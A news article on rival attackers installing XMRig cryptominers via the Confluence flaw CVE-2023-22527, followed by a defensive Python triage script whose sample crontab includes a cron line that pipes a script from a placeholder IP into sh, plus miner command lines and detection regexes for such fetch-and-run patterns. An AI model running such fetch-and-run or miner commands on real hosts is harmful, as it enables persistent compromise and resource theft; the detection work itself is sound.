Atlassian Confluence Data Center and Confluence Server previously had a high severity vulnerability that could allow remote attackers to execute malicious code.
Although the fix has been available for months, many unpatched instances remain exposed on the internet.
Hackers have been observed installing cryptocurrency miners on these servers, leaving victims with sky-high electricity bills and machines that are virtually unusable.
Fighting for control
That is according to a new report from cybersecurity researchers at Trend Micro. The report, published earlier this week, states that rival attackers compete with each other, repeatedly removing each other's cryptominers and installing their own.
The vulnerability is tracked as CVE-2023-22527. It is a critical flaw with a severity score of 10/10 that allows remote code execution, and it was patched in mid-January of this year. However, since mid-June of this year, criminals have been scanning for vulnerable instances and, where possible, removing any XMRig miner already present and installing their own. XMRig is the most popular crypto miner out there and mines the Monero (XMR) cryptocurrency. Monero is described as a privacy coin because it is virtually untraceable.
“The attacks are carried out by malicious actors using methods such as deploying shell scripts and XMRig miners, targeting SSH endpoints, disabling competing crypto mining processes, and enforcing persistence via cron jobs,” said Abdelrahman Esmail, a researcher at Trend Micro.
The section on “killing competing crypto mining processes” is particularly interesting. The researcher said that at least three different actors are struggling to maintain control over these endpoints. Once they compromise a server, they use a shell script to kill previous miners, remove all existing cron jobs, remove cloud security tools, and collect system data. They then establish a channel with their C2 server and launch a new miner.
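Those behaviours (an XMRig binary on disk, a miner talking to a pool, and cron entries that fetch and run a remote script for persistence) are what an administrator can look for on a Confluence host. The following Python triage script is an added example, not from Trend Micro or this article; the crontab and ps lines it scans are constructed sample data, and the IP address, pool name and file paths in them are placeholders.

```python
import re

# Constructed sample data (not from the report): crontab lines and ps output
# as a triage script might collect them from a suspected Confluence host.
SAMPLE_CRONTAB = """\
0 3 * * * /opt/atlassian/confluence/bin/backup.sh
*/5 * * * * curl -s http://198.51.100.23/x.sh | sh
@reboot /tmp/.X11/xmrig -o pool.example:3333 -k --donate-level=1
"""
SAMPLE_PS = """\
  PID USER     COMMAND
 1021 confluence /opt/java/openjdk/bin/java -Dcatalina.base=/opt/atlassian/confluence
 2345 confluence /tmp/.X11/xmrig -o pool.example:3333 -k --donate-level=1
 2399 root     /usr/sbin/sshd -D
"""

# Indicators drawn from the behaviour described above: an XMRig binary, a miner
# pointed at a pool, and a cron job that pipes a downloaded script into a shell.
MINER_PATTERNS = [
    re.compile(r"\bxmrig\b", re.I),
    re.compile(r"stratum\+tcp://|(?:-o|--url)\s+\S+:\d+", re.I),
    re.compile(r"--donate-level", re.I),
]
REMOTE_FETCH_EXEC = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b", re.I)

def suspicious_cron_entries(crontab_text):
    """Return crontab lines that pull a remote script into a shell or reference a miner."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if REMOTE_FETCH_EXEC.search(line) or any(p.search(line) for p in MINER_PATTERNS):
            hits.append(line)
    return hits

def miner_processes(ps_text):
    """Return (pid, user, command) tuples for processes matching miner indicators."""
    found = []
    for line in ps_text.splitlines()[1:]:  # skip the ps header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        if any(p.search(cmd) for p in MINER_PATTERNS):
            found.append((int(pid), user, cmd))
    return found

if __name__ == "__main__":
    for entry in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("suspicious cron:", entry)
    for pid, user, cmd in miner_processes(SAMPLE_PS):
        print(f"miner process pid={pid} user={user}: {cmd}")
```

On a live host, feed it the output of `crontab -l` for the Confluence service account and root, plus `ps -eo pid,user,args`; a hit running under the Confluence user is a strong sign the instance was exploited rather than merely exposed.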
“With its continued exploitation by threat actors, CVE-2023-22527 poses a significant security risk to organizations worldwide,” the researcher added. “To minimize the risks and threats associated with this vulnerability, administrators should update their Confluence Data Center and Confluence Server versions to the latest available versions as soon as possible.”
Via The Hacker News